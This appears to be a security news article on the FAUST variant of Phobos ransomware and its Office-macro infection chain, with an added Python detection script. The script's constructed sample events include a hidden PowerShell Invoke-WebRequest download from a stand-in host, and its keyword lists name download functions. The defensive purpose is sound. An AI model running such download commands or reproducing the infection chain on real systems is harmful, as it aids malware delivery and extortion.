A new variant of the infamous Phobos ransomware, FAUST, has recently appeared in the threat landscape.
Based on reports, this latest iteration represents an expansion of the Phobos strain. As of now, FAUST is the newest addition to the growing family of Phobos, joining Eking, Eight, Elbie, Devos, and 8Base.
Researchers stated that FAUST’s unique capability is its use of an Office document for propagation, which differs from the usual Phobos attack vector.
The FAUST variant leverages a particular document that contains a malicious script.
The FAUST infection chain begins with an XLAM document that stores an embedded VBA script. Once a target opens the document, the script triggers a PowerShell command that downloads Base64-encoded data from the Gitea service.
The operation then saves that data as an XLSX file, from which it covertly recovers an executable posing as an AVG antivirus software updater. This deceptive executable is a downloader that launches another executable called SmartScreen Defender Windows.exe, which uses a fileless technique to initiate the encryption process.
Confirmed FAUST capabilities include appending the [.]faust extension to encrypted files and generating info.txt and info.hta ransom notes within directories for communicating with the attackers during ransom negotiations.
Interestingly, to avoid system damage and to prevent the encryption of its own ransom information, FAUST excludes specific file extensions, directories, and filenames. The ransomware also has configurable decryption features and uses several threads for different tasks, such as deploying encryption, scanning files, and locating specific database-related files.
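The infection chain and host indicators described above translate directly into endpoint detection logic. The following is an added example, not code from the original report or from any vendor: it runs a few rules over constructed, Sysmon-style JSON process and file events (the field names, the AVGupdater.exe file name and the gitea.example.invalid URL are assumptions; the SmartScreen Defender Windows.exe name, the .faust extension and the info.txt/info.hta notes come from the report).

```python
import json
from pathlib import PureWindowsPath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command-line fragments consistent with the PowerShell download stage (Gitea, Base64).
DOWNLOAD_HINTS = ("gitea", "downloadstring", "downloadfile", "invoke-webrequest", "frombase64string")
RANSOM_NOTES = {"info.txt", "info.hta"}
DROPPER_NAME = "smartscreen defender windows.exe"  # final-stage executable named in the report

# Constructed sample events (assumed schema: type, parent, image, cmd, path). Not real telemetry.
SAMPLE_LOG = r"""
{"type":"process","parent":"C:\\Office16\\EXCEL.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell -w hidden Invoke-WebRequest https://gitea.example.invalid/raw/x"}
{"type":"process","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell Get-Date"}
{"type":"process","parent":"C:\\Users\\Public\\AVGupdater.exe","image":"C:\\Users\\Public\\SmartScreen Defender Windows.exe","cmd":""}
{"type":"file","path":"C:\\Users\\alice\\Documents\\budget.xlsx.faust"}
{"type":"file","path":"C:\\Users\\alice\\Documents\\info.hta"}
{"type":"file","path":"C:\\Users\\alice\\Documents\\notes.txt"}
"""

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def classify(event: dict) -> list[str]:
    """Return the names of the rules an event matches; an empty list means benign."""
    hits = []
    if event["type"] == "process":
        parent, image = basename(event["parent"]), basename(event["image"])
        cmd = event.get("cmd", "").lower()
        if parent in OFFICE_APPS and image in SHELLS:
            hits.append("office_spawned_powershell")      # macro -> PowerShell
            if any(h in cmd for h in DOWNLOAD_HINTS):
                hits.append("powershell_remote_download")  # the Gitea/Base64 stage
        if image == DROPPER_NAME:
            hits.append("faust_stage2_executable")         # impersonated SmartScreen binary
    elif event["type"] == "file":
        name = basename(event["path"])
        if name.endswith(".faust"):
            hits.append("faust_extension")
        if name in RANSOM_NOTES:
            hits.append("faust_ransom_note")
    return hits

def detect(log_text: str) -> list[tuple[str, str]]:
    """Run classify() over JSON lines and return (rule, evidence) pairs."""
    alerts = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        for rule in classify(event):
            alerts.append((rule, event.get("image") or event.get("path")))
    return alerts
```

On the sample, only the Excel-spawned PowerShell with a download command line, the impersonated SmartScreen binary, the .faust file and the info.hta note fire; the explorer-spawned PowerShell and notes.txt do not.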
However, these threats do not stop with FAUST, as two new ransomware families have also emerged recently. Albabat, alias White Bat, disguises itself as a fake Windows 10 digital activation tool and as a cheat program for Counter-Strike 2.
The researchers said this ransomware employs bring-your-own-vulnerable-driver (BYOVD) attacks to turn off antivirus software before encrypting files, resembling the notorious BlackMatter ransomware.
The constant evolution of ransomware shows the need for organisations to improve their cybersecurity defences. Protecting endpoints, regularly backing up files, and ensuring all software is updated are crucial measures for thwarting such malicious activities.
Additionally, leveraging indicators of compromise (IOCs) associated with ransomware can significantly enhance proactive defence strategies, helping organisations stay ahead of the ever-changing cybercriminal landscape.